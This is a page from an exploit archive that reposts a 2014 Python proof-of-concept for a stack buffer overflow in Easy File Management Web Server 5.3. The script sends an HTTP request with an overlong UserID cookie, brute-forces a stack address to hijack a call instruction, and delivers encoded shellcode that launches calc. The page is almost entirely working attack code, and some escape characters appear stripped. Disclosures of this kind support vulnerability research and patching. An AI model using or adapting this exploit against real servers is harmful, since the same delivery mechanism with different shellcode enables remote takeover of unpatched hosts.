Home / exploitsPDF  

Easy File Management Web Server 5.3 Buffer Overflow

Posted on 22 May 2014

#!/usr/bin/env python

# Exploit Title: Easy File Management Web Server 5.3 stack buffer overflow
# Date: 19 May 2014
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.efssoft.com
# Software Link: http://www.web-file-management.com/download.php
# Version: 5.3
# Tested on: English version of Windows XP Professional SP2 and SP3
#
# Description:
# By setting UserID in the cookie to a long string, we can overwrite EDX which
# allows us to control execution flow when the following instruction is
# executed:
#
# 0x00468702: call dword ptr [edx+28h]
#
# Very similar to Easy File Sharing Web Server 6.8 exploit here:
# http://www.exploit-db.com/exploits/33352/
# I suspect their other web server solutions might be vulnerable to a similar
# overflow.
#
# Tested with Easy File Management Web Server installed in the default location
# at C:EFS SoftwareEasy File Management Web Server

import socket
import struct
import sys

target = "172.16.229.134"
port = 80

# calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
# msfencode -b "x00x20" -i w32-exec-calc-shellcode.bin
# [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)
shellcode = (
"xd9xcbxbexb9x23x67x31xd9x74x24xf4x5ax29xc9" +
"xb1x13x31x72x19x83xc2x04x03x72x15x5bxd6x56" +
"xe3xc9x71xfax62x81xe2x75x82x0bxb3xe1xc0xd9" +
"x0bx61xa0x11xe7x03x41x84x7cxdbxd2xa8x9ax97" +
"xbax68x10xfbx5bxe8xadx70x7bx28xb3x86x08x64" +
"xacx52x0ex8dxddx2dx3cx3cxa0xfcxbcx82x23xa8" +
"xd7x94x6ex23xd9xe3x05xd4x05xf2x1bxe9x09x5a" +
"x1cx39xbd"
)

for i in xrange(1,255):
 n = ""
 if i < 16:
 n = "0" + hex(i)[-1]
 else:
 n = hex(i)[2:]

 # craft the value of EDX that will be used in CALL DWORD PTR DS:[EDX+28]
 # only second byte changes in the stack address changes, so we can brute
 # force it
 guess = "0x01" + n + "9898"
 print "trying", guess

 payload = "A"*20 # padding
 payload += struct.pack("<I", 0x1001646a) # call edi @LoadImage.dll
 payload += "B"*56 # padding
 payload += struct.pack("<I", int(guess, 16)) # guessed address in stack
 # containing pointer to
 # call edi

 payload += "x90"*20 # nop sled
 payload += shellcode # win!

 # craft the request
 buf = (
 "GET /vfolder.ghp HTTP/1.1
"
 "User-Agent: Mozilla/4.0
"
 "Host:" + target + ":" + str(port) + "
"
 "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
"
 "Accept-Language: en-us
"
 "Accept-Encoding: gzip, deflate
"
 "Referer: http://" + target + "/
"
 "Cookie: SESSIONID=6771; UserID=" + payload + "; PassWD=;
"
 "Conection: Keep-Alive

"
 )

 # send the request and payload to the server
 s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s1.connect((target, port))
 s1.send(buf)
 s1.close()

 

TOP

Malware :

Exploits :